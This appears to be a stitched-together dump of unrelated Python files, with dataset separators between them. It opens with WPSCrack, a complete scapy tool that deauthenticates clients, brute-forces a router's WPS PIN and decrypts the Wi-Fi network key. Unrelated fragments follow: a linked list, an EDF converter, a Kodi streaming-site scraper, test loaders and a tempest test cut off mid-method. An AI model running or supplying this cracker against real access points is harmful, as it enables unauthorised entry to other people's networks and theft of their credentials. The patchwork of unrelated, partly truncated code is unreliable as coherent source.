This software was written by <NAME> <<EMAIL>>
based on the Windows Connect Now - NET spec and code in wpa_supplicant.
Consider this beerware. Prost!
'''
import time, threading, hmac, hashlib, sys, optparse, random
from struct import pack, unpack
from Crypto.Cipher import AES
from scapy.all import *
class WPSCrack:
verbose = None
client_mac = None
bssid = None
ssid = None
secret_number = None
timeout_time = None
pin = None
# 1536-bit MODP Group from RFC 3526
prime_str = 'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD1'\
'29024E088A67CC74020BBEA63B139B22514A08798E3404DD'\
'EF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245'\
'E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED'\
'EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3D'\
'C2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F'\
'83655D23DCA3AD961C62F356208552BB9ED529077096966D'\
'670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF'
prime_int = int(prime_str, 16)
rcved_auth_response = False
rcved_asso_response = False
rcved_eap_request_identity = False
rcved_m1 = False
rcved_m3 = False
rcved_m5 = False
m4_sent = False
got_fist_half = False
done = False
request_EAP_id = 0
last_msg_buffer = ''
rcved = threading.Event()
ENonce = ''
RNonce = ''
PK_E = ''
PK_R = ''
EnrolleeMAC = ''
AuthKey = ''
KeyWrapKey = ''
EMSK = ''
PSK1 = ''
PSK2 = ''
E_S1 = ''
E_S2 = ''
EHash1 = ''
EHash2 = ''
R_S1 = ''
R_S2 = ''
RHash1 = ''
RHash1 = ''
has_auth_failed = False
has_timeout = False
has_retry = False
wps_attributes = {
0xFF00 : 'Vendor',
0xFF01 : 'Vendor Type',
0xFF02 : 'Opcode',
0xFF03 : 'Flags',
0x104A : 'Version',
0x104A : 'Authentication Flags',
0x1022 : 'Message Type',
0x1047 : 'UUID E',
0x1020 : 'MAC',
0x101a : 'Enrollee Nonce',
0x1032 : 'Public Key',
0x1010 : 'Encryption Type Flags',
0x100d : 'Connection Type Flags',
0x1008 : 'Config Methods',
0x100d : 'Wifi Protected Setup State',
0x1021 : 'Manufacturer',
0x1023 : 'Model Name',
0x1024 : 'Model Number',
0x1042 : 'Serial Number',
0x1054 : 'Primary Device Type',
0x1011 : 'Device Name',
0x103c : 'RF Bands',
0x1002 : 'Association State',
0x1012 : 'Device pin',
0x1009 : 'Configuration Error',
0x102d : 'OS Version',
0x1044 : 'Wifi Protected Setup State',
0x1004 : 'Authentication Type',
0x1005 : 'Authenticator',
0x1048 : 'UUID R',
0x1039 : 'Registrar Nonce',
0x1014 : 'E Hash 1',
0x1015 : 'E Hash 2',
0x103D : 'R Hash 2',
0x103E : 'R Hash 2',
0x1018 : 'Encrypted Settings',
0x103F : 'R-S1',
0x101e : 'Key Wrap Algorithm',
0x1016 : 'E-S1',
0x1017 : 'E-S2',
0x1003 : 'Auth Type',
0x100F : 'Encryption Type',
0x1003 : 'Auth Type',
0x1027 : 'Network Key',
0x1028 : 'Network Key Index',
0x1045 : 'SSID'
}
wps_message_types = {
0x04 : 'M1',
0x05 : 'M2',
0x07 : 'M3',
0x08 : 'M4',
0x09 : 'M5',
0x0a : 'M6',
0x0b : 'M7',
0x0c : 'M8',
0x0f : 'WSC_DONE',
0x0e : 'WSC_NACK'
}
def run(self):
sniffer_thread = threading.Thread(target=self.sniffer)
sniffer_thread.start()
time.sleep(1)
authorization_request = RadioTap() / Dot11(proto=0L, FCfield=0L, subtype=11L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, SC=0, type=0L) \
/ Dot11Auth(status=0, seqnum=1, algo=0)
association_request = RadioTap() / Dot11(proto=0L, FCfield=0L, subtype=0L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, SC=0, type=0L) \
/ Dot11AssoReq(listen_interval=5, cap=12548L) \
/ Dot11Elt(info=self.ssid, ID=0, len=len(self.ssid)) \
/ Dot11Elt(info='\x02\x04\x0b\x16\x0c\x12\x18$', ID=1, len=8) \
/ Dot11Elt(info='0H`l', ID=50, len=4) \
/ Dot11Elt(info='\x00P\xf2\x02\x00\x01\x00', ID=221, len=7) \
/ Dot11Elt(info='\x00P\xf2\x04\x10J\x00\x01\x10\x10:\x00\x01\x02', ID=221, len=14)
# TODO: add 802.11n capabilities
eapol_start = RadioTap() / Dot11(proto=0L, FCfield=1L, subtype=8L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, SC=0, type=2L, ID=0) \
/ Dot11QoS(TID=0L, TXOP=0, Reserved=0L, EOSP=0L) \
/ LLC(dsap=170, ssap=170, ctrl=3) \
/ SNAP(OUI=0, code=34958) \
/ EAPOL(version=1, type=1, len=0)
response_identity = RadioTap() / Dot11(proto=0L, FCfield=1L, subtype=8L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, SC=0, type=2L, ID=0) \
/ Dot11QoS(TID=0L, Reserved=0L, TXOP=0, EOSP=0L) \
/ LLC(dsap=170, ssap=170, ctrl=3) \
/ SNAP(OUI=0, code=34958) \
/ EAPOL(version=1, type=0, len=35) \
/ EAP(code=2, type=1, id=0, len=35) \
/ Raw(load='WFA-SimpleConfig-Registrar-1-0')
i = 0
while self.done == False:
if self.done == True:
break
self.rcved_auth_response = False
self.rcved_asso_response = False
self.rcved_eap_request_identity = False
self.rcved_m1 = False
self.rcved_m3 = False
self.rcved_m5 = False
self.m4_sent = False
i += 1
if self.verbose: print '------------------- attempt #%i' % i
timeout_timer = threading.Timer(self.timeout_time, self.timeout)
timeout_timer.start()
self.has_auth_failed = False
self.has_timeout = False
self.has_retry = False
start_time = time.time()
print 'Trying', self.pin
self.send_deauth()
if self.verbose: print '-> 802.11 authentication request'
self.rcved.clear()
sendp(authorization_request, verbose=0)
self.rcved.wait()
if self.rcved_auth_response == True:
if self.verbose: print '-> 802.11 association request'
self.rcved.clear()
sendp(association_request, verbose=0)
self.rcved.wait()
if self.rcved_asso_response == True:
if self.verbose: print '-> EAPOL start'
self.rcved.clear()
sendp(eapol_start, verbose=0)
self.rcved.wait()
if self.rcved_eap_request_identity == True:
if self.verbose: print '-> EAP response identity'
response_identity[EAP].id = self.request_EAP_id
self.rcved.clear()
sendp(response_identity, verbose=0)
self.rcved.wait()
if self.rcved_m1 == True:
if self.verbose: print '-> M2'
self.rcved.clear()
self.send_M2()
self.rcved.wait()
if self.rcved_m3 == True:
if self.verbose: print '-> M4'
self.rcved.clear()
self.send_M4()
self.m4_sent = True
self.rcved.wait()
if self.rcved_m5 == True:
if self.verbose: print '-> M6'
self.rcved.clear()
self.send_M6()
self.rcved.wait()
self.send_deauth()
time.sleep(0.05)
self.rcved.clear()
timeout_timer.cancel()
if self.verbose: print 'attempt took %.3f seconds' % (time.time() - start_time)
self.gen_pin()
def bignum_pack(self, n, l):
return ''.join([(chr((n >> ((l - i - 1) * 8)) % 256)) for i in xrange(l)])
def bignum_unpack(self, byte):
return sum([ord(b) << (8 * i) for i, b in enumerate(byte[::-1])])
def kdf(self, key, personalization_string, el):
x = ''
for i in range (1, (sum(el) + 32 - 1) / 32): # slow
s = pack('!I', i) + personalization_string + pack('!I', sum(el))
x += hmac.new(key, s, hashlib.sha256).digest()
r = []
c = 0
for e in el:
r.append(x[c:c + (e / 8)])
c += e / 8
return r
def gen_keys(self):
pubkey_enrollee = self.bignum_unpack(self.PK_E)
pubkey_registrar = pow(2, self.secret_number, self.prime_int)
shared_key = self.bignum_pack(pow(pubkey_enrollee, self.secret_number, self.prime_int), 192)
self.PK_R = self.bignum_pack(pubkey_registrar, 192)
self.RNonce = os.urandom(16)
DHKey = hashlib.sha256(shared_key).digest()
KDK = hmac.new(DHKey, self.ENonce + self.EnrolleeMAC + self.RNonce, hashlib.sha256).digest()
self.AuthKey, self.KeyWrapKey, self.EMSK = self.kdf(KDK, 'Wi-Fi Easy and Secure Key Derivation', [256, 128, 256])
self.R_S1 = '\00' * 16 #random enough
self.R_S2 = '\00' * 16
self.PSK1 = hmac.new(self.AuthKey, self.pin[0:4], hashlib.sha256).digest()[:16]
self.PSK2 = hmac.new(self.AuthKey, self.pin[4:8], hashlib.sha256).digest()[:16]
self.RHash1 = hmac.new(self.AuthKey, self.R_S1 + self.PSK1 + self.PK_E + self.PK_R, hashlib.sha256).digest()
self.RHash2 = hmac.new(self.AuthKey, self.R_S2 + self.PSK2 + self.PK_E + self.PK_R, hashlib.sha256).digest()
def PKCS5_2_0_pad(self, s):
pad_len = 16 - len(s) % 16;
x = pack('b', pad_len)
s += (x * pad_len)[:pad_len]
return s
def encrypt(self, lst):
to_enc_s = self.assemble_EAP_Expanded(lst)
kwa = hmac.new(self.AuthKey, to_enc_s, hashlib.sha256).digest()[0:8]
iv = '\00' * 16
to_enc_s += self.assemble_EAP_Expanded([[0x101e, kwa]])
plaintext = self.PKCS5_2_0_pad(to_enc_s)
ciphertext = AES.new(self.KeyWrapKey, AES.MODE_CBC, iv).encrypt(plaintext)
return iv, ciphertext
def decrypt(self, iv, ciphertext):
p = AES.new(self.KeyWrapKey, AES.MODE_CBC, iv).decrypt(ciphertext)
plaintext = p[:len(p) - ord(p[-1])] # remove padding
return self.disassemble_EAP_Expanded(plaintext)
def gen_authenticator(self, msg):
return hmac.new(self.AuthKey, self.last_msg_buffer[9:] + msg, hashlib.sha256).digest()[:8]
def send_M2(self):
if self.ENonce == '':
print 'enonce is empty!!!'
m2 = [
[0xFF00, '\x00\x37\x2A'],
[0xFF01, '\x00\x00\x00\x01'],
[0xFF02, '\x04'],
[0xFF03, '\x00'],
[0x104A, '\x10'],
# message type:
[0x1022, '\x05'],
# enrollee nonce:
[0x101A, self.ENonce],
# registrar nonce:
[0x1039, self.RNonce],
# uuid registrar:
[0x1048, '\x12\x34\x56\x78\x9A\xBC\xDE\xF0\x12\x34\x56\x78\x9A\xBC\xDE\xF0'],
# public key:
[0x1032, self.PK_R],
[0x1004, '\x00\x3F'],
[0x1010, '\x00\x0F'],
[0x100D, '\x01'],
[0x1008, '\x01\x08'],
[0x1021, '\x00'],
[0x1023, '\x00'],
[0x1024, '\x00'],
[0x1042, '\x00'],
[0x1054, '\x00\x00\x00\x00\x00\x00\x00\x00'],
[0x1011, '\x00'],
[0x103C, '\x03'],
[0x1002, '\x00\x00'],
[0x1009, '\x00\x00'],
[0x1012, '\x00\x00'],
[0x102D, '\x80\x00\x00\x00']
]
eap_expanded = self.assemble_EAP_Expanded(m2)
m = RadioTap() / Dot11(proto=0L, FCfield=1L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, subtype=8L, SC=80, type=2L, ID=55808) \
/ Dot11QoS(TID=0L, Reserved=0L, TXOP=0, EOSP=0L) / LLC(dsap=170, ssap=170, ctrl=3) \
/ SNAP(OUI=0, code=34958) \
/ EAPOL(version=1, type=0, len=383) \
/ EAP(code=2, type=254, id=self.request_EAP_id, len=383) \
/ Raw(load=eap_expanded)
authenticator = self.gen_authenticator(str(m[Raw])[9:])
m = m / Raw(load=(self.assemble_EAP_Expanded([[0x1005, authenticator]])))
sendp(m, verbose=0)
def send_M4(self):
ConfigData = [[0x103f, self.R_S1]]
iv, ciphertext = self.encrypt(ConfigData)
m4 = [
[0xFF00, '\x00\x37\x2A'],
[0xFF01, '\x00\x00\x00\x01'],
[0xFF02, '\x04'],
[0xFF03, '\x00'],
[0x104A, '\x10'],
[0x1022, '\x08'],
# ENonce
[0x101A, self.ENonce],
# RHash1
[0x103D, self.RHash1],
# RHash2
[0x103E, self.RHash2],
# Encrypted RS1
[0x1018, iv + ciphertext]
]
eap_expanded = self.assemble_EAP_Expanded(m4)
m = RadioTap() / Dot11(proto=0L, FCfield=1L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, subtype=8L, SC=80, type=2L, ID=55808) \
/ Dot11QoS(TID=0L, Reserved=0L, TXOP=0, EOSP=0L) \
/ LLC(dsap=170, ssap=170, ctrl=3) \
/ SNAP(OUI=0, code=34958) \
/ EAPOL(version=1, type=0, len=196) \
/ EAP(code=2, type=254, id=self.request_EAP_id, len=196) \
/ Raw(load=eap_expanded)
authenticator = self.gen_authenticator(str(m[Raw])[9:])
m = m / Raw(load=(self.assemble_EAP_Expanded([[0x1005, authenticator]])))
sendp(m, verbose=0)
def send_M6(self):
ConfigData = [[0x1040, self.R_S2]]
iv, ciphertext = self.encrypt(ConfigData)
m6 = [
[0xFF00, '\x00\x37\x2A'],
[0xFF01, '\x00\x00\x00\x01'],
[0xFF02, '\x04'],
[0xFF03, '\x00'],
[0x104A, '\x10'],
[0x1022, '\x0A'],
# ENonce
[0x101A, self.ENonce],
# Encrypted RS_1
[0x1018, iv + ciphertext]
]
eap_expanded = self.assemble_EAP_Expanded(m6)
m = RadioTap() / Dot11(proto=0L, FCfield=1L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, subtype=8L, SC=80, type=2L, ID=55808) \
/ Dot11QoS(TID=0L, Reserved=0L, TXOP=0, EOSP=0L) / LLC(dsap=170, ssap=170, ctrl=3) \
/ SNAP(OUI=0, code=34958) / EAPOL(version=1, type=0, len=124) \
/ EAP(code=2, type=254, id=self.request_EAP_id, len=124) / Raw(load=eap_expanded)
authenticator = self.gen_authenticator(str(m[Raw])[9:])
m = m / Raw(load=(self.assemble_EAP_Expanded([[0x1005, authenticator]])))
sendp(m, verbose=0)
def parse_EAP_Expanded(self, l):
d = {}
message_type = None
#performance ?
for e in l:
d[e[0]] = e[1]
if 0x1022 in d:
if ord(d[0x1022]) in self.wps_message_types:
message_type = self.wps_message_types[ord(d[0x1022])]
if self.verbose: print '<-', message_type
else:
print '< unknown Message Type: 0x%X', ord(d[0x1022])
if message_type == 'M1':
self.ENonce = d[0x101a]
self.PK_E = d[0x1032]
self.EnrolleeMAC = d[0x1020]
self.gen_keys()
self.rcved_m1 = True
elif message_type == 'M3':
self.EHash1 = d[0x1014]
self.EHash2 = d[0x1015]
self.rcved_m3 = True
elif message_type == 'M5':
# we could validate the data but it makes no sense
if self.got_fist_half is False:
print 'found first half:', self.pin[0:4]
self.got_fist_half = True
self.rcved_m5 = True
elif message_type == 'M7':
# juice
print '-------------------------- FOUND PIN: %s --------------------------' % self.pin
encrypted = d[0x1018]
x = self.decrypt(encrypted[:16], encrypted[16:])
self.dump_EAP_Expanded(x)
self.done = True
elif message_type == 'WSC_NACK':
if self.m4_sent == True:
self.has_auth_failed = True
nack = [
[0xFF00, '\x00\x37\x2A'],
[0xFF01, '\x00\x00\x00\x01'],
[0xFF02, '\x03'],
[0xFF03, '\x00'],
[0x104A, '\x10'],
[0x1022, '\x0E'],
#
[0x101A, self.ENonce],
[0x1039, self.RNonce],
[0x1009, '\x00\x00']
]
eap_expanded = self.assemble_EAP_Expanded(nack)
m = RadioTap() / Dot11(proto=0L, FCfield=1L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, subtype=8L, SC=80, type=2L, ID=55808) \
/ Dot11QoS(TID=0L, Reserved=0L, TXOP=0, EOSP=0L) / LLC(dsap=170, ssap=170, ctrl=3) \
/ SNAP(OUI=0, code=34958) \
/ EAPOL(version=1, type=0, len=70) \
/ EAP(code=2, type=254, id=self.request_EAP_id, len=70) \
/ Raw(load=eap_expanded)
if self.verbose: print '-> WCS_NACK'
sendp(m, verbose=0)
else:
print 'got NACK before M4 - something is wrong'
self.has_retry = True
return
def sniffer_filter(self, x):
if (self.done == True):
return True
elif (self.rcved.is_set() is False):
if x.haslayer(Dot11) and x[Dot11].addr1 == self.client_mac and x[Dot11].addr3 == self.bssid:
if x.haslayer(Dot11Auth) and x[Dot11Auth].status == 0:
if self.verbose: print '<- 802.11 authentication response'
self.rcved_auth_response = True
self.rcved.set()
elif x.haslayer(Dot11AssoResp) and x[Dot11AssoResp].status == 0:
if self.verbose: print '<- 802.11 association response'
self.rcved_asso_response = True
self.rcved.set()
elif x.haslayer(EAP) and x[EAP].code == 1:
self.request_EAP_id = x[EAP].id
if x[EAP].type == 254: #Type: Expanded Type
self.last_msg_buffer = str(x[Raw])[:-4]
disasm = self.disassemble_EAP_Expanded(x[Raw], has_FCS=True, has_start=True)
self.parse_EAP_Expanded(disasm)
self.rcved.set()
elif x[EAP].type == 1:
if self.verbose: print '<- EAP request identity'
if self.rcved_eap_request_identity == False:
self.rcved_eap_request_identity = True
self.rcved.set()
else:
print 'got unknown EAP message:'
print x.command()
return False
else:
# discard all messages if we don't want to receive
return False
def sniffer(self):
print 'sniffer started'
sniff(store=0, stop_filter=lambda x: self.sniffer_filter(x))
print 'sniffer stopped'
sys.exit()
def timeout(self):
print 'TIMEOUT!!'
self.rcved.set()
self.has_timeout = True
def should_continue(self):
if self.has_timeout == True or self.has_auth_failed == True or self.has_retry == True:
return False
else:
return True
def gen_pin(self):
if self.has_timeout == False and self.rcved_m3 == True:
if self.got_fist_half == True:
pin_int = int(self.pin[0:7]) + 1
else:
pin_int = int(self.pin[0:7]) + 1000
# append checksum
accum = 0
t = pin_int
while (t):
accum += 3 * (t % 10)
t /= 10
accum += t % 10
t /= 10
self.pin = '%07i%01i' % (pin_int, (10 - accum % 10) % 10)
def send_deauth(self):
if self.verbose: print '-> 802.11 deauthentication'
deauth = RadioTap() / Dot11(proto=0L, FCfield=0L, subtype=12L, addr2=self.client_mac, addr3=self.bssid, addr1=self.bssid, SC=0, type=0L, ID=0) \
/ Dot11Deauth(reason=1)
sendp(deauth, verbose=0)
def disassemble_EAP_Expanded(self, p, has_FCS=False, has_start=False):
ret = []
i = 0
if has_FCS:
e = str(p)[:-4] #remove FCS
else:
e = str(p)
if has_start:
ret.append([0xFF00, e[0:3]])
ret.append([0xFF01, e[3:7]])
ret.append([0xFF02, e[7:8]])
ret.append([0xFF03, e[8:9]])
i = 9
while i < len(e) - 4:
data_length = unpack('!H', e[i + 2:i + 4])[0]
ret.append([unpack('!H', e[i:i + 2])[0], e[(i + 4):(i + 4 + unpack('!H', e[i + 2:i + 4])[0])] ])
i += data_length + 4
return ret
def assemble_EAP_Expanded(self, l):
ret = ''
for i in range(len(l)):
if l[i][0] & 0xFF00 == 0xFF00:
ret += (l[i][1])
else:
ret += pack('!H', l[i][0]) + pack('!H', len(l[i][1])) + l[i][1]
return ret
def dump_EAP_Expanded(self, lst):
for e in lst:
if e[0] in self.wps_attributes:
print self.wps_attributes[e[0]], ':'
hexdump(e[1])
else:
print 'Message ID 0x%X not found!' % e[0]
print e
def main():
wps = WPSCrack()
parser = optparse.OptionParser('usage: %prog --iface=IFACE --client=CLIENT_MAC --bssid=BSSID --ssid=SSID [optional arguments]')
parser.add_option('-i', '--iface', dest='iface', default='', type='string', help='network interface (monitor mode)')
parser.add_option('-c', '--client', dest='client_mac', default='', type='string', help='MAC of client interface')
parser.add_option('-b', '--bssid', dest='bssid', default='', type='string', help='MAC of AP (BSSID)')
parser.add_option('-s', '--ssid', dest='ssid', default='', type='string', help='SSID of AP (ESSID)')
parser.add_option('--dh', dest='dh_secret', default=1, type='int', help='diffie-hellman secret number')
parser.add_option('-t', '--timeout', dest='timeout', default=5, type='int', help='timemout in seconds')
parser.add_option('-p', '--pin', dest='start_pin', default='00000000', type='string', help='start pin for brute force')
parser.add_option('-v', '--verbose', action='store_true', dest='verbose', default=False, help='verbose')
(options, _) = parser.parse_args()
if options.iface != '' and options.client_mac != '' and options.bssid != '' and options.ssid != '':
conf.iface = options.iface
wps.client_mac = options.client_mac
wps.bssid = options.bssid
wps.ssid = options.ssid
wps.secret_number = options.dh_secret
wps.timeout_time = options.timeout
wps.verbose = options.verbose
wps.pin = options.start_pin
wps.run()
else:
print 'check arguments or use --help!'
return
if __name__ == '__main__':
main() | StarcoderdataPython |
11295768 | class Node:
def __init__(self, data):
self.data = data
self.next = None
class LinkedList:
def __init__(self, value):
self.head = Node(value)
def append(self, value):
cur = self.head
while cur.next is not None:
cur = cur.next
cur.next = Node(value)
def print_all(self):
cur = self.head
while cur is not None:
print(cur.data)
cur = cur.next
def get_node(self, index):
node = self.head
count = 0
while count < index:
node = node.next
count += 1
return node
def add_node(self, index, value):
new_node = Node(value)
if index == 0:
new_node.next = self.head
self.head = new_node
return
node = self.get_node(index - 1)
next_node = node.next
node.next = new_node
new_node.next = next_node
def delete_node(self, index):
node = self.get_node(index - 1)
if index == 0:
self.head = node.next
return
# node = self.get_node(index - 1)
node.next = node.next.next
return "index 번째 Node를 제거해주세요!"
linked_list = LinkedList(5)
linked_list.append(12)
linked_list.append(6)
linked_list.add_node(0, 3)
linked_list.print_all()
print('-------delete---------')
linked_list.delete_node(3)
linked_list.print_all()
| StarcoderdataPython |
3511448 | <filename>minimum_example/to_h5.py
import json
import os
import sys
import h5py
import pyedflib
import tqdm
print("\n Converting EDF and annotations to standard H5 file")
download_directory = sys.argv[1]
h5_directory = sys.argv[2]
if not os.path.isdir(h5_directory):
os.makedirs(h5_directory)
records = [
x.split(".")[0] for x in os.listdir(download_directory) if x[-3:] == "edf"
]
for record in tqdm.tqdm(records):
edf_filename = download_directory + record + ".edf"
spindle_filename = download_directory + record + "_spindle.json"
h5_filename = '{}/{}.h5'.format(h5_directory, record)
with h5py.File(h5_filename, 'w') as h5:
# Taking care of spindle annotations
spindles = [
(x["start"], x["end"] - x["start"]) for x in json.load(open(spindle_filename))
]
starts, durations = list(zip(*spindles))
h5.create_group("spindle")
h5.create_dataset("spindle/start", data=starts)
h5.create_dataset("spindle/duration", data=durations)
# Extract signals
with pyedflib.EdfReader(edf_filename) as f:
labels = f.getSignalLabels()
frequencies = f.getSampleFrequencies().astype(int).tolist()
for i, (label, frequency) in enumerate(zip(labels, frequencies)):
path = "{}".format(label.lower())
data = f.readSignal(i)
h5.create_dataset(path, data=data)
h5[path].attrs["fs"] = frequency
| StarcoderdataPython |
3242391 | <reponame>C6SUMMER/allinclusive-kodi-pi
"""
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import scraper
import re
import urlparse
import xbmcaddon
import xbmc
from salts_lib import log_utils
from salts_lib.trans_utils import i18n
from salts_lib.constants import VIDEO_TYPES
from salts_lib.constants import QUALITIES
from salts_lib.constants import USER_AGENT
BASE_URL = 'http://ororo.tv'
CATEGORIES = {VIDEO_TYPES.TVSHOW: '2,3', VIDEO_TYPES.MOVIE: '1,3,4'}
class OroroTV_Scraper(scraper.Scraper):
base_url = BASE_URL
def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):
self.timeout = timeout
self.base_url = xbmcaddon.Addon().getSetting('%s-base_url' % (self.get_name()))
self.username = xbmcaddon.Addon().getSetting('%s-username' % (self.get_name()))
self.password = xbmcaddon.Addon().getSetting('%s-password' % (self.get_name()))
@classmethod
def provides(cls):
return frozenset([VIDEO_TYPES.TVSHOW, VIDEO_TYPES.SEASON, VIDEO_TYPES.EPISODE, VIDEO_TYPES.MOVIE])
@classmethod
def get_name(cls):
return 'ororo.tv'
def resolve_link(self, link):
return link
def format_source_label(self, item):
label = '[%s] %s (%s) (%s/100) ' % (item['quality'], item['host'], item['format'], item['rating'])
return label
def get_sources(self, video):
source_url = self.get_url(video)
hosters = []
if source_url:
url = urlparse.urljoin(self.base_url, source_url)
html = self._http_get(url, cache_limit=.5)
if video.video_type == VIDEO_TYPES.MOVIE:
quality = QUALITIES.HD720
match = re.search('data-href="([^"]+)', html)
if match:
source_url = match.group(1)
url = urlparse.urljoin(self.base_url, source_url)
html = self._http_get(url, cache_limit=.5)
else:
quality = QUALITIES.HIGH
for match in re.finditer("source src='([^']+)'\s+type='video/([^']+)", html):
stream_url, format = match.groups()
stream_url = stream_url + '|User-Agent=%s' % (USER_AGENT)
hoster = {'multi-part': False, 'host': self._get_direct_hostname(stream_url), 'class': self, 'url': stream_url, 'quality': quality, 'views': None, 'rating': None, 'format': format, 'direct': True}
hosters.append(hoster)
return hosters
def get_url(self, video):
return super(OroroTV_Scraper, self)._default_get_url(video)
def _get_episode_url(self, show_url, video):
episode_pattern = 'data-href="([^"]+)[^>]*class="episode"\s+href="#%s-%s"' % (video.season, video.episode)
title_pattern = 'data-href="([^"]+)[^>]+class="episode"[^>]+>.\d+\s+([^<]+)'
return super(OroroTV_Scraper, self)._default_get_episode_url(show_url, video, episode_pattern, title_pattern)
def search(self, video_type, title, year):
url = urlparse.urljoin(self.base_url, 'http://ororo.tv/en')
if video_type == VIDEO_TYPES.MOVIE:
url += '/movies'
html = self._http_get(url, cache_limit=.25)
results = []
norm_title = self._normalize_title(title)
include_paid = xbmcaddon.Addon().getSetting('%s-include_premium' % (self.get_name())) == 'true'
for match in re.finditer('<span class=\'value\'>(\d{4})(.*?)href="([^"]+)[^>]+>([^<]+)', html, re.DOTALL):
match_year, middle, url, match_title = match.groups()
if not include_paid and video_type == VIDEO_TYPES.MOVIE and 'paid accounts' in middle:
continue
if norm_title in self._normalize_title(match_title) and (not year or not match_year or year == match_year):
result = {'url': url, 'title': match_title, 'year': match_year}
results.append(result)
return results
@classmethod
def get_settings(cls):
settings = super(OroroTV_Scraper, cls).get_settings()
name = cls.get_name()
settings.append(' <setting id="%s-username" type="text" label=" %s" default="" visible="eq(-6,true)"/>' % (name, i18n('username')))
settings.append(' <setting id="%s-password" type="text" label=" %s" option="hidden" default="" visible="eq(-7,true)"/>' % (name, i18n('password')))
settings.append(' <setting id="%s-include_premium" type="bool" label=" %s" default="false" visible="eq(-8,true)"/>' % (name, i18n('include_premium')))
return settings
def _http_get(self, url, data=None, cache_limit=8):
# return all uncached blank pages if no user or pass
if not self.username or not self.password:
return ''
html = super(OroroTV_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, cache_limit=cache_limit)
if not re.search('href="/en/users/sign_out"', html):
log_utils.log('Logging in for url (%s)' % (url), xbmc.LOGDEBUG)
self.__login()
html = super(OroroTV_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, cache_limit=0)
return html
def __login(self):
url = urlparse.urljoin(self.base_url, '/en/users/sign_in')
data = {'user[email]': self.username, 'user[password]': <PASSWORD>, 'user[remember_me]': 1}
html = super(OroroTV_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, allow_redirect=False, cache_limit=0)
if html != 'http://ororo.tv/en':
raise Exception('ororo.tv login failed: %s' % (html))
| StarcoderdataPython |
335074 | <reponame>TheWITProject/MentorApp<filename>userProfile/migrations/0008_remove_profile_location.py
# Generated by Django 2.2.10 on 2020-04-13 23:53
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('userProfile', '0007_profile_location_q'),
]
operations = [
migrations.RemoveField(
model_name='profile',
name='location',
),
]
| StarcoderdataPython |
4849699 | import glob
import os
from eth_utils import to_tuple
from ruamel.yaml import YAML
from yaml_test_execution import execute_ssz_test_case, execute_tree_hash_test_case
YAML_BASE_DIR = os.path.abspath(os.path.join(__file__, "../../eth2.0-tests/"))
SSZ_TEST_FILES = glob.glob(
os.path.join(YAML_BASE_DIR, "ssz", "**/*.yaml"), recursive=True
)
TREE_HASH_TEST_FILES = glob.glob(
os.path.join(YAML_BASE_DIR, "tree_hash", "**/*.yaml"), recursive=True
)
@to_tuple
def load_test_cases(filenames):
yaml = YAML()
for filename in sorted(filenames):
with open(filename) as f:
test = yaml.load(f)
for test_case in test["test_cases"]:
yield test_case, make_test_id(filename, test_case)
def make_test_id(filename, test_case):
return f"{filename}:{test_case.lc.line}"
def pytest_generate_tests(metafunc):
fixture_to_test_files = {
"ssz_test_case": SSZ_TEST_FILES,
"tree_hash_test_case": TREE_HASH_TEST_FILES,
}
for fixture_name, test_files in fixture_to_test_files.items():
if fixture_name in metafunc.fixturenames:
test_cases_with_ids = load_test_cases(test_files)
if len(test_cases_with_ids) > 0:
test_cases, test_ids = zip(*test_cases_with_ids)
else:
test_cases, test_ids = (), ()
metafunc.parametrize(fixture_name, test_cases, ids=test_ids)
def test_ssz(ssz_test_case):
execute_ssz_test_case(ssz_test_case)
def test_tree_hash(tree_hash_test_case):
execute_tree_hash_test_case(tree_hash_test_case)
| StarcoderdataPython |
12819283 | <reponame>cm107/common_utils
from functools import wraps
import sys
import traceback
def bypass_error_in_classmethod(print_func=print):
def inner(method):
@wraps(method)
def wrapper(self, *args, **kwargs):
try:
method(self, *args, **kwargs)
except:
etype, evalue, tb = sys.exc_info()
e = traceback.format_tb(tb=tb)
print_func(''.join(e[1:]))
return wrapper
return inner
def bypass_error_in_func(print_func=print):
def inner(func):
@wraps(func)
def wrapper(*args, **kwargs):
try:
func(*args, **kwargs)
except:
etype, evalue, tb = sys.exc_info()
e = traceback.format_tb(tb=tb)
print_func(''.join(e[1:]))
return wrapper
return inner | StarcoderdataPython |
9546 | <reponame>nuagenetworks/nuage-tempest-plugin
# Copyright 2017 NOKIA
# All Rights Reserved.
from netaddr import IPNetwork
import testtools
from tempest.common import waiters
from tempest.lib import exceptions
from tempest.scenario import manager
from tempest.test import decorators
from nuage_tempest_plugin.lib.test.nuage_test import NuageAdminNetworksTest
from nuage_tempest_plugin.lib.test.nuage_test import NuageBaseTest
from nuage_tempest_plugin.lib.topology import Topology
from nuage_tempest_plugin.lib.utils import constants
from nuage_tempest_plugin.services.nuage_client import NuageRestClient
CONF = Topology.get_conf()
LOG = Topology.get_logger(__name__)
class PortsTest(NuageBaseTest, NuageAdminNetworksTest,
manager.NetworkScenarioTest):
@classmethod
def setup_clients(cls):
super(PortsTest, cls).setup_clients()
cls.vsd_client = NuageRestClient()
def show_port(self, port_id):
